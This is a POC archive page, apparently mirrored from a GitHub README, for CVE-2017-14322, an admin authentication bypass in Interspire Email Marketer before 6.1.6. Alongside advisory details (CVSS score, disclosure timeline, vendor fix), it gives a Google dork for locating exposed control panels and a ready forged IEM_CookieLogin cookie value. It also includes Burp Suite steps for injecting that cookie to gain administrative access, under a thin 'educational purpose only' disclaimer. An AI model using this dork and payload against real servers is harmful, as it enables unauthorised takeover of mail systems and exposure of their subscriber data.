POC详情: 23cf0c2fbe6fcba1d120aaece73613a1c8a74354

来源
关联漏洞
标题: BigCommerec Interspire Email Marketer 安全漏洞 (CVE-2017-14322)
描述:BigCommerec Interspire Email Marketer(IEM)是美国BigCommerec公司的一套电子邮件营销软件。 BigCommerec IEM 6.1.6之前的版本中的init.php文件的用于检测用户登录状态的函数存在安全漏洞。远程攻击者可通过使用带有特制值的IEM_CookieLogin cookie利用该漏洞绕过身份验证,获取管理访问权限。
描述
CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit
介绍
# CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Google Dork
============
```
intitle:"Control Panel" + emailmarketer
```

Exploit using Burp Suit
=======================

Add a Match and Replace for Request header like below:
```
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
```
When you open the site, it won't work for the first time as the Cookie header is not present. Refresh the site 2nd time using Burp proxy with added above rule, you'll see what you have wanted. Make sure to tick on "Intercept Client Requests"

Title:
======
Interspire Email Marketer - Remote Admin Authentication Bypass

Author:
=======
Hakan Küsne, Infoteam Security (CH)

CVE-ID:
=======
CVE-2017-14322

Risk Information:
=================
CVSS Base Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Timeline:
=========
2017-09-12 Vulnerability discovered
2017-09-12 Discovered vendor already fixed it but never communicated to clients, leaving hundreds vulnerable in the wild
2017-10-17 Public disclosure

Affected Products:
==================
Interspire Email Marketer prior to version 6.1.6

Vendor Homepage:
================
http://www.interspire.com/emailmarketer/

Details:
========
The function in charge of checking whether the user is already logged in 
init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows 
remote attackers to bypass authentication and obtain administrative 
access by using the IEM_CookieLogin cookie with a specially crafted 
value.
On top of that, if the customer doesn't have an annuel maintenance plan, 
the application says that it's on the last available version and there is no update.

The vulnerabilities were found during an incident response on a compromise 
instance of the application.

Proof of Concept:
=================
Details provided here : 
https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html 

Fix:
====
Vendor has patched the vulnerability in version 6.1.6, but never communicated to it's customers about it specifically.

Note:
=====
This exploit is for educational purpose only and not responsible for your own actions.
文件快照

[4.0K] /data/pocs/23cf0c2fbe6fcba1d120aaece73613a1c8a74354 └── [2.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。